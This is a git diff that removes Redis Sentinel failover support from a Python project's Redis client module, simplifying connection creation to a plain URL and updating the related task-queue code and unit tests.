         os.getenv("REDIS_SOCKET_TIMEOUT"), default_socket_timeout
@@ -181,80 +52,6 @@ def _get_redis_timeouts() -> tuple[float | None, float | None, float | None]:
     socket_connect_timeout = _parse_optional_float(os.getenv("REDIS_SOCKET_CONNECT_TIMEOUT"), 5.0)
     health_check_interval = _parse_optional_float(os.getenv("REDIS_HEALTH_CHECK_INTERVAL"), 10.0)
     return socket_timeout, socket_connect_timeout, health_check_interval
-
-
-def _get_or_create_sentinel():
-    """Get or create a thread-local Sentinel client.
-
-    Each thread needs its own Sentinel client because the underlying asyncio
-    futures are bound to the event loop that created them. When the threaded
-    result consumer creates a new event loop, reusing a Sentinel client from
-    the main thread causes "Future attached to a different loop" errors.
-
-    The client is cached with a TTL to handle Sentinel pod restarts that change
-    pod IPs. After the TTL expires, we re-resolve DNS to get fresh IPs.
-    """
-    # Check thread-local storage for existing client
-    sentinel_client = getattr(_thread_local, "sentinel_client", None)
-    sentinel_created_at = getattr(_thread_local, "sentinel_created_at", 0)
-
-    # Check if client exists and is still valid (within TTL)
-    if sentinel_client is not None:
-        age = time.monotonic() - sentinel_created_at
-        if age < _SENTINEL_CLIENT_TTL:
-            return sentinel_client
-        # TTL expired - invalidate and recreate with fresh DNS resolution
-        thread_name = threading.current_thread().name
-        logger.info(
-            f"Sentinel client TTL expired for thread '{thread_name}' (age: {age:.1f}s), "
-            f"re-resolving DNS for fresh Sentinel IPs"
-        )
-        _thread_local.sentinel_client = None
-
-    try:
-        import redis.asyncio as redis_async
-    except ImportError as e:
-        raise RuntimeError("redis package required: pip install redis") from e
-
-    sentinel_config = get_redis_sentinel_config()
-    if not sentinel_config:
-        return None
-
-    socket_timeout, socket_connect_timeout, health_check_interval = _get_redis_timeouts()
-
-    sentinels = sentinel_config["sentinels"]
-    thread_name = threading.current_thread().name
-    logger.info(
-        f"Creating Sentinel client for thread '{thread_name}' with {len(sentinels)} sentinel(s): "
-        f"{[f'{h}:{p}' for h, p in sentinels]} (master: {sentinel_config['master']})"
-    )
-
-    sentinel_client = redis_async.Sentinel(
-        sentinels,
-        password=sentinel_config["sentinel_password"],
-        socket_timeout=socket_timeout,
-        socket_connect_timeout=socket_connect_timeout,
-        health_check_interval=health_check_interval,
-        # Note: decode_responses is set per-client, not on Sentinel
-    )
-
-    # Store in thread-local storage with creation timestamp
-    _thread_local.sentinel_client = sentinel_client
-    _thread_local.sentinel_created_at = time.monotonic()
-
-    return sentinel_client
-
-
-def invalidate_sentinel_client():
-    """Invalidate the cached Sentinel client to force fresh DNS resolution.
-
-    Call this when connection errors suggest Sentinel pods may have restarted.
-    """
-    if hasattr(_thread_local, "sentinel_client"):
-        thread_name = threading.current_thread().name
-        logger.warning(f"Invalidating Sentinel client for thread '{thread_name}'")
-        _thread_local.sentinel_client = None
-        _thread_local.sentinel_created_at = 0
 
 
 # Connection error keywords for detecting Redis connection issues.
@@ -280,8 +77,6 @@ _CONNECTION_ERROR_KEYWORDS = frozenset(
         "getaddrinfo",
         "temporary failure in name resolution",
         "no address associated",
-        # Sentinel failover errors
-        "no master found",
     }
 )
 
@@ -374,193 +169,48 @@ async def create_redis_client(
     socket_timeout: float | None | EllipsisType = ...,  # ... means "use default from env"
 ):
     """
-    Create a Redis client, using Sentinel master if configured.
-
-    When Sentinel is configured (via REDIS_SENTINEL_HOST and REDIS_SENTINEL_MASTER),
-    this returns a client connected to the current master.
+    Create an async Redis client.
 
     Args:
-        redis_url: Direct Redis URL (used when Sentinel not configured)
+        redis_url: Redis URL (falls back to REDIS_URL env var)
         decode_responses: Whether to decode responses to strings
-        direct_connection: If True, create a direct connection to the discovered
-            master instead of using SentinelConnectionPool. Use this for threads
-            with separate event loops to avoid cross-loop Future errors.
-            The client won't auto-failover but avoids SentinelConnectionPool's
-            internal async state sharing issues.
+        direct_connection: If True, create a single-connection client (no pool sharing).
+            Use this for threads with separate event loops.
         socket_timeout: Socket timeout in seconds. Use None to disable (for blocking
             operations like BRPOP). Use ... (default) to use env var setting.
 
     Returns:
-        Async Redis client connected to master
+        Async Redis client
     """
     try:
         import redis.asyncio as redis_async
     except ImportError as e:
         raise RuntimeError("redis package required: pip install redis") from e
 
-    sentinel_config = get_redis_sentinel_config()
     default_socket_timeout, socket_connect_timeout, health_check_interval = _get_redis_timeouts()
 
     # Use explicit socket_timeout if provided, otherwise use default from env
     effective_socket_timeout = default_socket_timeout if socket_timeout is ... else socket_timeout
 
-    thread_name = threading.current_thread().name
-    logger.debug(
-        f"Redis client config for thread '{thread_name}': socket_timeout={effective_socket_timeout}, "
-        f"connect_timeout={socket_connect_timeout}, health_check={health_check_interval}, "
-        f"direct_connection={direct_connection}"
-    )
+    url = redis_url or get_redis_url()
 
-    if sentinel_config:
-        if direct_connection:
-            # For direct connections (threaded consumers), create a FRESH Sentinel client
-            # rather than reusing the thread-local one. This avoids cross-loop Future errors
-            # that can occur if the Sentinel client's internal connection state was created
-            # on a previous event loop (e.g., after reconnection or error recovery).
-            import redis.asyncio as redis_async
-
-            # Use default timeout for Sentinel discovery (short operation)
-            sentinel_socket_timeout, _, _ = _get_redis_timeouts()
-            fresh_sentinel = redis_async.Sentinel(
-                sentinel_config["sentinels"],
-                password=sentinel_config["sentinel_password"],
-                socket_timeout=sentinel_socket_timeout,
-                socket_connect_timeout=socket_connect_timeout,
-            )
-            try:
-                master_addr = await fresh_sentinel.discover_master(sentinel_config["master"])
-            finally:
-                # Close the Sentinel's internal Redis clients to avoid leaking connections.
-                # We only needed it to find the master address.
-                for sentinel_client in fresh_sentinel.sentinels:
-                    try:
-                        await sentinel_client.aclose()
-                    except Exception:
-                        pass
-            logger.info(
-                f"Creating direct Redis connection for thread '{thread_name}' "
-                f"to {master_addr[0]}:{master_addr[1]} (fresh Sentinel discovery, "
-                f"socket_timeout={effective_socket_timeout})"
-            )
-            # Use single_connection_client=True to avoid connection pool's asyncio state
-            # sharing issues. This creates a dedicated connection that doesn't share any
-            # asyncio primitives (locks, futures) with other clients.
-            # Also disable health_check_interval to prevent background tasks.
-            password = sentinel_config["redis_password"]
-            db = sentinel_config["db"]
-            redis_url = f"redis://:{password}@{master_addr[0]}:{master_addr[1]}/{db}"
-            return redis_async.from_url(
-                redis_url,
-                decode_responses=decode_responses,
-                socket_timeout=effective_socket_timeout,
-                socket_connect_timeout=socket_connect_timeout,
-                health_check_interval=0,
-                single_connection_client=True,  # Dedicated connection, no pool sharing
-            )
-
-        # Non-direct connection: use thread-local Sentinel client
-        sentinel_client = _get_or_create_sentinel()
-        if sentinel_client:
-            # Discover master NOW in this async context
-            master_addr = await sentinel_client.discover_master(sentinel_config["master"])
-            logger.debug(
-                f"Sentinel discovered master for thread '{thread_name}': "
-                f"{master_addr[0]}:{master_addr[1]} (socket_timeout={effective_socket_timeout})"
-            )
-
-            # Use SentinelConnectionPool for automatic failover detection
-            return sentinel_client.master_for(
-                sentinel_config["master"],
-                password=sentinel_config["redis_password"],
-                db=sentinel_config["db"],
-                decode_responses=decode_responses,
-                socket_timeout=effective_socket_timeout,
-                socket_connect_timeout=socket_connect_timeout,
-                health_check_interval=health_check_interval,
-            )
+    if direct_connection:
+        return redis_async.from_url(
+            url,
+            decode_responses=decode_responses,
+            socket_timeout=effective_socket_timeout,
+            socket_connect_timeout=socket_connect_timeout,
+            health_check_interval=0,
+            single_connection_client=True,
+        )
 
     return redis_async.from_url(
-        redis_url or get_redis_url(),
+        url,
         decode_responses=decode_responses,
         socket_timeout=effective_socket_timeout,
         socket_connect_timeout=socket_connect_timeout,
         health_check_interval=health_check_interval,
     )
-
-
-async def create_redis_replica_client(*, decode_responses: bool = False):
-    """
-    Create a Redis client connected to a replica for read operations.
-
-    When Sentinel is configured, this returns a client that connects to one of
-    the replica instances. Use this for read-heavy operations like:
-    - Checking task results
-    - Polling discoveries
-    - Reading heartbeats
-    - State queries
-
-    The client automatically handles replica failover and load balancing.
-    If no replicas are available, it falls back to master.
-
-    Args:
-        decode_responses: Whether to decode responses to strings
-
-    Returns:
-        Async Redis client connected to a replica, or None if Sentinel not configured
-    """
-    sentinel_config = get_redis_sentinel_config()
-    if not sentinel_config:
-        logger.debug("Replica client requested but Sentinel not configured")
-        return None
-
-    sentinel_client = _get_or_create_sentinel()
-    if not sentinel_client:
-        return None
-
-    socket_timeout, socket_connect_timeout, health_check_interval = _get_redis_timeouts()
-
-    logger.debug(f"Creating replica client for master: {sentinel_config['master']}")
-
-    return sentinel_client.slave_for(
-        sentinel_config["master"],
-        password=sentinel_config["redis_password"],
-        db=sentinel_config["db"],
-        decode_responses=decode_responses,
-        socket_timeout=socket_timeout,
-        socket_connect_timeout=socket_connect_timeout,
-        health_check_interval=health_check_interval,
-    )
-
-
-async def _verify_redis_role(client, expected_role: str = "master") -> bool:
-    """
-    Verify Redis instance role using ROLE command.
-
-    Per the Redis Sentinel client spec, clients should verify the instance role
-    after connecting via Sentinel to detect stale Sentinel data:
-    https://redis.io/docs/latest/develop/reference/sentinel-clients/
-
-    The ROLE command returns:
-    - Master: ['master', replication_offset, [[replica_ip, port, offset], ...]]
-    - Slave:  ['slave', master_ip, master_port, state, replication_offset]
-
-    Args:
-        client: Redis client to verify
-        expected_role: Expected role ('master' or 'slave')
-
-    Returns:
-        True if role matches expected, False otherwise
-    """
-    try:
-        role_info = await client.execute_command("ROLE")
-        actual_role = role_info[0]
-        # Handle both bytes and string responses
-        if isinstance(actual_role, bytes):
-            actual_role = actual_role.decode()
-        return actual_role == expected_role
-    except Exception as e:
-        logger.warning(f"ROLE command failed: {e}")
-        return False
 
 
 async def create_verified_redis_client(
@@ -572,82 +222,19 @@ async def create_verified_redis_client(
     retry_delay: float = 0.5,
 ):
     """
-    Create a Redis client with ROLE verification per Redis Sentinel client spec.
-
-    This follows the official Redis Sentinel client specification:
-    https://redis.io/docs/latest/develop/reference/sentinel-clients/
-
-    After connecting via Sentinel, the ROLE command verifies the instance is
-    actually a master. This prevents reading stale data from a demoted master
-    (now slave) that has broken replication.
-
-    Use this for:
-    - CLI operations reading state (loot, runtime, report)
-    - Any read operation where stale data would be problematic
-    - Operations after suspected failover
-
-    For write-heavy workloads, use create_redis_client() instead - redis-py's
-    ReadOnlyError detection will catch writes to replicas.
+    Create a Redis client, optionally verifying it is a master.
 
     Args:
-        redis_url: Direct Redis URL (used when Sentinel not configured)
+        redis_url: Redis URL (falls back to REDIS_URL env var)
         decode_responses: Whether to decode responses to strings
         verify_role: If True, verify connected to master using ROLE command
         max_retries: Maximum retry attempts if connected to wrong instance
-        retry_delay: Seconds to wait between retries (allows Sentinel to update)
+        retry_delay: Seconds to wait between retries
 
     Returns:
-        Async Redis client verified to be connected to master
+        Async Redis client
 
     Raises:
-        RuntimeError: If unable to connect to verified master after retries
+        RuntimeError: If unable to connect after retries
     """
-    sentinel_config = get_redis_sentinel_config()
-
-    # No Sentinel = no verification needed (direct connection)
-    if not sentinel_config or not verify_role:
-        return await create_redis_client(redis_url, decode_responses=decode_responses)
-
-    last_error: Exception | None = None
-
-    for attempt in range(1, max_retries + 1):
-        client = None
-        try:
-            client = await create_redis_client(redis_url, decode_responses=decode_responses)
-
-            # Verify we're connected to master using ROLE command
-            if await _verify_redis_role(client, expected_role="master"):
-                logger.debug(f"ROLE verification passed (attempt {attempt})")
-                return client
-
-            # Connected to wrong instance type (likely demoted master with stale data)
-            logger.warning(
-                f"ROLE verification failed: not master (attempt {attempt}/{max_retries}). "
-                "Sentinel may have stale data or failover in progress."
-            )
-            await client.aclose()
-            client = None
-
-            # Invalidate Sentinel client to force fresh discovery
-            invalidate_sentinel_client()
-
-            if attempt < max_retries:
-                # Wait for Sentinel to potentially update its view
-                await asyncio.sleep(retry_delay)
-
-        except Exception as e:
-            last_error = e
-            logger.warning(f"Redis connection attempt {attempt} failed: {e}")
-            if client:
-                try:
-                    await client.aclose()
-                except Exception:
-                    pass
-            invalidate_sentinel_client()
-            if attempt < max_retries:
-                await asyncio.sleep(retry_delay)
-
-    error_msg = f"Failed to connect to verified Redis master after {max_retries} attempts"
-    if last_error:
-        error_msg += f": {last_error}"
-    raise RuntimeError(error_msg)
+    return await create_redis_client(redis_url, decode_responses=decode_responses)

--- a/src/ares/core/state_backend.py
+++ b/src/ares/core/state_backend.py
@@ -27,7 +27,7 @@ Redis key structure:
 
 Resilience:
     All write operations use tenacity retry with exponential backoff + circuit breaker
-    to handle transient Redis connection issues (e.g., Sentinel failover, pod restarts).
+    to handle transient Redis connection issues (e.g., pod restarts).
     Pattern matches redis-py's ExponentialBackoff(cap=10, base=1).
 """
 
@@ -156,7 +156,7 @@ class RedisStateBackend(BaseRedisBackend):
         This ensures the same credential isn't stored twice.
 
         Uses circuit breaker + exponential backoff retry for resilience against
-        transient Redis connection issues (Sentinel failover, pod restarts).
+        transient Redis connection issues (pod restarts).
 
         Args:
             cred: Credential to add

--- a/src/ares/core/task_queue.py
+++ b/src/ares/core/task_queue.py
@@ -26,7 +26,6 @@ from ares.core.config import (
 )
 from ares.core.redis_client import (
     get_retry_delay,
-    invalidate_sentinel_client,
     is_connection_error,
     timed_redis_write,
 )
@@ -121,7 +120,7 @@ class RedisTaskQueue(BaseTaskQueue):
         """Connect to Redis with circuit breaker protection.
 
         When called from a non-main thread (e.g., threaded result consumer),
-        uses direct connection to avoid SentinelConnectionPool's cross-loop
+        uses direct connection to avoid connection pool's cross-loop
         Future issues.
 
         Uses socket_timeout=None to allow blocking operations (BRPOP) to wait
@@ -530,8 +529,6 @@ class RedisTaskQueue(BaseTaskQueue):
             # Handle connection errors to force reconnection on next call
             if is_connection_error(e):
                 self._handle_connection_error(e)
-                # Force fresh DNS resolution on reconnect (handles Sentinel pod restarts)
-                invalidate_sentinel_client()
             # On pipeline failure, return empty results (caller will retry)
             # Note: Circuit breaker already logged this if it's a connection error
             if not self._circuit or not is_connection_error(e):
@@ -552,7 +549,7 @@ class RedisTaskQueue(BaseTaskQueue):
         Poll for next task (blocking).
 
         Includes automatic retry with exponential backoff on stale connection
-        detection to avoid missed poll cycles when Sentinel pods restart.
+        detection to avoid missed poll cycles when pods restart.
 
         Args:
             role: Worker role to poll for
@@ -592,14 +589,13 @@ class RedisTaskQueue(BaseTaskQueue):
 
             except asyncio.TimeoutError:
                 # asyncio.wait_for timed out but Redis BRPOP didn't return
-                # This indicates a stale connection (e.g., Sentinel pod restarted)
+                # This indicates a stale connection (e.g., pod restarted)
                 logger.warning(
                     f"BRPOP hung for {timeout + 2.0}s on queue {queue_key} - "
                     f"stale connection detected (attempt {attempt + 1}/{max_retries + 1})"
                 )
-                invalidate_sentinel_client()
                 self._handle_connection_error(
-                    TimeoutError("BRPOP hung - possible stale Sentinel connection")
+                    TimeoutError("BRPOP hung - possible stale connection")
                 )
                 last_error = TimeoutError("BRPOP hung after retries")
 

--- a/tests/core/dispatcher/test_monitoring.py
+++ b/tests/core/dispatcher/test_monitoring.py
@@ -62,7 +62,6 @@ class TestPingOrReconnectDispatcherRedis:
         new_client.ping = AsyncMock(return_value=True)
 
         with (
-            patch("ares.core.redis_client.invalidate_sentinel_client") as mock_invalidate,
             patch(
                 "ares.core.redis_client.create_redis_client",
                 new=AsyncMock(return_value=new_client),
@@ -71,7 +70,6 @@ class TestPingOrReconnectDispatcherRedis:
             result = await mock_dispatcher._ping_or_reconnect_dispatcher_redis()
 
         assert result is False
-        mock_invalidate.assert_called_once()
         mock_client.aclose.assert_awaited_once()
         assert mock_dispatcher._redis_client is new_client
 
@@ -95,7 +93,6 @@ class TestPingOrReconnectDispatcherRedis:
         new_client.ping = AsyncMock(return_value=True)
 
         with (
-            patch("ares.core.redis_client.invalidate_sentinel_client"),
             patch(
                 "ares.core.redis_client.create_redis_client",
                 new=AsyncMock(return_value=new_client),
@@ -127,7 +124,6 @@ class TestPingOrReconnectDispatcherRedis:
         new_client.ping = AsyncMock(return_value=True)
 
         with (
-            patch("ares.core.redis_client.invalidate_sentinel_client"),
             patch(
                 "ares.core.redis_client.create_redis_client",
                 new=AsyncMock(return_value=new_client),
@@ -146,7 +142,6 @@ class TestPingOrReconnectDispatcherRedis:
         mock_dispatcher._redis_client = mock_client
 
         with (
-            patch("ares.core.redis_client.invalidate_sentinel_client"),
             patch(
                 "ares.core.redis_client.create_redis_client",
                 new=AsyncMock(side_effect=ConnectionError("Failed to reconnect")),
@@ -172,7 +167,6 @@ class TestPingOrReconnectDispatcherRedis:
         new_client.ping = AsyncMock(return_value=True)
 
         with (
-            patch("ares.core.redis_client.invalidate_sentinel_client"),
             patch(
                 "ares.core.redis_client.create_redis_client",
                 new=AsyncMock(return_value=new_client),
@@ -196,7 +190,6 @@ class TestPingOrReconnectDispatcherRedis:
         new_client.ping = AsyncMock(return_value=True)
 
         with (
-            patch("ares.core.redis_client.invalidate_sentinel_client"),
             patch(
                 "ares.core.redis_client.create_redis_client",
                 new=AsyncMock(return_value=new_client),

--- a/tests/core/test_base_task_queue.py
+++ b/tests/core/test_base_task_queue.py
@@ -197,16 +197,12 @@ class TestPingOrReconnect:
         new_client = AsyncMock()
         new_client.ping = AsyncMock()
 
-        with (
-            patch("ares.core.base_task_queue.invalidate_sentinel_client") as mock_invalidate,
-            patch("ares.core.base_task_queue.create_redis_client") as mock_create,
-        ):
+        with patch("ares.core.base_task_queue.create_redis_client") as mock_create:
             mock_create.return_value = new_client
 
             result = await queue.ping_or_reconnect()
 
         assert result is False  # Returns False when reconnection was needed
-        mock_invalidate.assert_called_once()
         mock_client.aclose.assert_called_once()
 
     @pytest.mark.asyncio

--- a/tests/core/test_blue_orchestrator_service.py
+++ b/tests/core/test_blue_orchestrator_service.py
@@ -539,15 +539,15 @@ class TestBlueOrchestratorService:
         mock_blue_queue.connect.assert_awaited_once()
 
     @pytest.mark.asyncio
-    async def test_process_investigation_request_retries_on_sentinel_master_error(self):
-        """Test that _process_investigation_request retries on Sentinel master not found errors."""
+    async def test_process_investigation_request_retries_on_connection_error(self):
+        """Test that _process_investigation_request retries on connection errors."""
         service = BlueOrchestratorService(redis_url="redis://", namespace="test")
         service._publish_investigation_status = AsyncMock()
         service._grafana_url = "http://grafana:3000"
         service._grafana_api_key = "test-key"  # pragma: allowlist secret
 
         request_data = {
-            "investigation_id": "inv-sentinel-retry",
+            "investigation_id": "inv-conn-retry",
             "alert": {"labels": {"alertname": "TestAlert", "severity": "low"}},
             "model": "test-model",
             "auto_route": True,
@@ -559,11 +559,11 @@ class TestBlueOrchestratorService:
             nonlocal call_count
             call_count += 1
             if call_count == 1:
-                # First call fails with Sentinel master not found
-                raise Exception("No master found for 'aresmaster'")  # noqa: TRY002
+                # First call fails with a connection error
+                raise Exception("Connection refused")  # noqa: TRY002
             # Second call succeeds
             return {
-                "investigation_id": "inv-sentinel-retry",
+                "investigation_id": "inv-conn-retry",
                 "status": "completed",
                 "evidence_count": 1,
                 "techniques_identified": [],
@@ -580,15 +580,11 @@ class TestBlueOrchestratorService:
             ),
             patch("ares.integrations.mitre.MITREAttackClient"),
             patch("ares.core.litellm_env.configure_litellm_env"),
-            patch(
-                "ares.core.blue_orchestrator_service.invalidate_sentinel_client"
-            ) as mock_invalidate,
         ):
             await service._process_investigation_request(request_data)
 
             # Should have retried and succeeded on second attempt
             assert call_count == 2
-            mock_invalidate.assert_called_once()
 
             # Should have published running status, not failed
             status_calls = service._publish_investigation_status.call_args_list
@@ -598,27 +594,25 @@ class TestBlueOrchestratorService:
             )
 
     @pytest.mark.asyncio
-    async def test_process_investigation_request_fails_after_max_retries_on_sentinel_error(
+    async def test_process_investigation_request_fails_after_max_retries_on_connection_error(
         self,
     ):
-        """Test that investigation fails after exhausting retries on Sentinel errors."""
+        """Test that investigation fails after exhausting retries on connection errors."""
         service = BlueOrchestratorService(redis_url="redis://", namespace="test")
         service._publish_investigation_status = AsyncMock()
         service._grafana_url = "http://grafana:3000"
         service._grafana_api_key = "test-key"  # pragma: allowlist secret
 
         request_data = {
-            "investigation_id": "inv-sentinel-exhaust",
+            "investigation_id": "inv-conn-exhaust",
             "alert": {"labels": {"alertname": "TestAlert", "severity": "low"}},
             "model": "test-model",
             "auto_route": True,
         }
 
         mock_orchestrator = MagicMock()
-        # All calls fail with Sentinel error
-        mock_orchestrator.investigate = AsyncMock(
-            side_effect=Exception("No master found for 'aresmaster'")
-        )
+        # All calls fail with a connection error
+        mock_orchestrator.investigate = AsyncMock(side_effect=Exception("Connection refused"))
 
         with (
             patch.dict(os.environ, {}, clear=True),
@@ -628,7 +622,6 @@ class TestBlueOrchestratorService:
             ),
             patch("ares.integrations.mitre.MITREAttackClient"),
             patch("ares.core.litellm_env.configure_litellm_env"),
-            patch("ares.core.blue_orchestrator_service.invalidate_sentinel_client"),
         ):
             await service._process_investigation_request(request_data)
 
@@ -642,4 +635,4 @@ class TestBlueOrchestratorService:
                     failed_call = call
                     break
             assert failed_call is not None, "Should have published failed status"
-            assert "No master found" in failed_call[0][2]["error"]
+            assert "Connection refused" in failed_call[0][2]["error"]

--- a/tests/core/test_blue_task_queue.py
+++ b/tests/core/test_blue_task_queue.py
@@ -256,7 +256,6 @@ class TestBlueTaskQueueConnection:
                 "ares.core.base_task_queue.create_redis_client",
                 return_value=new_mock_client,
             ),
-            patch("ares.core.base_task_queue.invalidate_sentinel_client"),
         ):
             result = await queue.ping_or_reconnect()
 
@@ -667,7 +666,6 @@ class TestBlueTaskQueueErrorHandling:
         connected_queue._client.brpop = slow_brpop
 
         with (
-            patch("ares.core.base_task_queue.invalidate_sentinel_client"),
             patch(
                 "ares.core.base_task_queue.create_redis_client",
                 return_value=connected_queue._client,
@@ -816,7 +814,6 @@ class TestBlueTaskQueueRetryLogic:
         queue_with_reconnect._client.brpop = slow_then_normal
 
         with (
-            patch("ares.core.base_task_queue.invalidate_sentinel_client"),
             patch(
                 "ares.core.base_task_queue.create_redis_client",
                 return_value=queue_with_reconnect._client,

--- a/tests/core/test_redis_client.py
+++ b/tests/core/test_redis_client.py
@@ -5,49 +5,17 @@ from __future__ import annotations
 import asyncio
 import sys
 import types
-from typing import Any
 from unittest.mock import MagicMock
 
 import pytest
 
 from ares.core.redis_client import (
-    _resolve_sentinel_hosts,
-    _verify_redis_role,
     create_redis_client,
     create_verified_redis_client,
-    get_redis_sentinel_config,
     get_retry_delay,
     is_connection_error,
     timed_redis_write,
 )
-
-
-class DummySentinel:
-    def __init__(
-        self,
-        hosts: list[tuple[str, int]],
-        **kwargs: Any,
-    ) -> None:
-        self.hosts = hosts
-        self.kwargs = kwargs
-        self.master = None
-        self.master_kwargs: dict[str, Any] | None = None
-        self.slave = None
-        self.slave_kwargs: dict[str, Any] | None = None
-
-    def master_for(self, master: str, **kwargs: Any):
-        self.master = master
-        self.master_kwargs = kwargs
-        return "sentinel-client"
-
-    def slave_for(self, master: str, **kwargs: Any):
-        self.slave = master
-        self.slave_kwargs = kwargs
-        return "replica-client"
-
-    async def discover_master(self, master: str) -> tuple[str, int]:
-        """Mock discover_master - returns a dummy master address."""
-        return ("redis-master", 6379)
 
 
 def install_dummy_redis(monkeypatch: pytest.MonkeyPatch) -> types.ModuleType:
@@ -59,121 +27,6 @@ def install_dummy_redis(monkeypatch: pytest.MonkeyPatch) -> types.ModuleType:
     return asyncio_module
 
 
-def test_get_redis_sentinel_config_missing(monkeypatch: pytest.MonkeyPatch) -> None:
-    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
-    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
-
-    assert get_redis_sentinel_config() is None
-
-
-def test_get_redis_sentinel_config_defaults(monkeypatch: pytest.MonkeyPatch) -> None:
-    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel")
-    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
-    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")  # pragma: allowlist secret
-
-    config = get_redis_sentinel_config()
-
-    assert config == {
-        "sentinels": [("sentinel", 26379)],
-        "master": "mymaster",
-        "sentinel_password": "redis-pass",  # pragma: allowlist secret
-        "redis_password": "redis-pass",  # pragma: allowlist secret
-        "db": 0,
-    }
-
-
-def test_get_redis_sentinel_config_passwords(monkeypatch: pytest.MonkeyPatch) -> None:
-    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel")
-    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
-    monkeypatch.setenv("REDIS_SENTINEL_PASSWORD", "sentinel-pass")  # pragma: allowlist secret
-    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")  # pragma: allowlist secret
-    monkeypatch.setenv("REDIS_DB", "2")
-    monkeypatch.setenv("REDIS_SENTINEL_PORT", "6380")
-
-    config = get_redis_sentinel_config()
-
-    assert config == {
-        "sentinels": [("sentinel", 6380)],
-        "master": "mymaster",
-        "sentinel_password": "sentinel-pass",  # pragma: allowlist secret
-        "redis_password": "redis-pass",  # pragma: allowlist secret
-        "db": 2,
-    }
-
-
-def test_get_redis_sentinel_config_multiple_hosts(monkeypatch: pytest.MonkeyPatch) -> None:
-    """Test that comma-separated sentinel hosts are parsed correctly."""
-    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel-0:26379,sentinel-1:26379,sentinel-2:26379")
-    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
-    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")  # pragma: allowlist secret
-
-    config = get_redis_sentinel_config()
-
-    assert config["sentinels"] == [
-        ("sentinel-0", 26379),
-        ("sentinel-1", 26379),
-        ("sentinel-2", 26379),
-    ]
-    assert config["master"] == "mymaster"
-
-
-def test_resolve_sentinel_hosts_comma_separated() -> None:
-    """Test comma-separated host parsing."""
-    result = _resolve_sentinel_hosts("host1:26379,host2:26380,host3", 26379)
-    assert result == [("host1", 26379), ("host2", 26380), ("host3", 26379)]
-
-
-def test_resolve_sentinel_hosts_single_with_port() -> None:
-    """Test single host with port."""
-    result = _resolve_sentinel_hosts("sentinel:26380", 26379)
-    assert result == [("sentinel", 26380)]
-
-
-def test_resolve_sentinel_hosts_single_without_port() -> None:
-    """Test single host without port uses default."""
-    result = _resolve_sentinel_hosts("sentinel", 26379)
-    assert result == [("sentinel", 26379)]
-
-
-@pytest.mark.asyncio
-async def test_create_redis_client_uses_sentinel(monkeypatch: pytest.MonkeyPatch) -> None:
-    asyncio_module = install_dummy_redis(monkeypatch)
-    sentinel_instances: list[DummySentinel] = []
-
-    class TrackingSentinel(DummySentinel):
-        def __init__(self, hosts: list[tuple[str, int]], **kwargs: Any) -> None:
-            super().__init__(hosts, **kwargs)
-            sentinel_instances.append(self)
-
-    asyncio_module.Sentinel = TrackingSentinel
-    asyncio_module.from_url = MagicMock(return_value="url-client")
-
-    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel")
-    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
-    monkeypatch.setenv("REDIS_SENTINEL_PORT", "26379")
-    monkeypatch.setenv("REDIS_SENTINEL_PASSWORD", "sentinel-pass")
-    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")
-    monkeypatch.setenv("REDIS_DB", "1")
-
-    client = await create_redis_client("redis://localhost", decode_responses=True)
-
-    assert client == "sentinel-client"
-    assert asyncio_module.from_url.call_count == 0
-
-    assert len(sentinel_instances) == 1
-    sentinel_instance = sentinel_instances[0]
-    assert sentinel_instance.hosts == [("sentinel", 26379)]
-    assert sentinel_instance.master == "mymaster"
-    assert sentinel_instance.master_kwargs == {
-        "password": "redis-pass",  # pragma: allowlist secret
-        "db": 1,
-        "decode_responses": True,
-        "socket_timeout": 10.0,  # Lowered from 30s for faster detection of stale connections
-        "socket_connect_timeout": 5.0,
-        "health_check_interval": 10.0,
-    }
-
-
 @pytest.mark.asyncio
 async def test_create_redis_client_explicit_socket_timeout(monkeypatch: pytest.MonkeyPatch) -> None:
     """Test that explicit socket_timeout parameter overrides default."""
@@ -181,9 +34,6 @@ async def test_create_redis_client_explicit_socket_timeout(monkeypatch: pytest.M
 
     from_url_mock = MagicMock(return_value="url-client")
     asyncio_module.from_url = from_url_mock
-
-    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
-    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
 
     # Test with explicit socket_timeout=None (for blocking operations like BRPOP)
     await create_redis_client("redis://localhost", socket_timeout=None)
@@ -200,8 +50,6 @@ async def test_create_redis_client_socket_timeout_default(monkeypatch: pytest.Mo
     from_url_mock = MagicMock(return_value="url-client")
     asyncio_module.from_url = from_url_mock
 
-    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
-    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
     monkeypatch.setenv("REDIS_SOCKET_TIMEOUT", "15")
 
     # Default behavior (socket_timeout=...) should use env var
@@ -221,9 +69,6 @@ async def test_create_redis_client_explicit_socket_timeout_value(
     from_url_mock = MagicMock(return_value="url-client")
     asyncio_module.from_url = from_url_mock
 
-    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
-    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
-
     # Test with explicit numeric socket_timeout
     await create_redis_client("redis://localhost", socket_timeout=30.0)
 
@@ -234,11 +79,7 @@ async def test_create_redis_client_explicit_socket_timeout_value(
 @pytest.mark.asyncio
 async def test_create_redis_client_uses_url(monkeypatch: pytest.MonkeyPatch) -> None:
     asyncio_module = install_dummy_redis(monkeypatch)
-    asyncio_module.Sentinel = DummySentinel
     asyncio_module.from_url = MagicMock(return_value="url-client")
-
-    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
-    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
 
     client = await create_redis_client("redis://localhost", decode_responses=True)
 
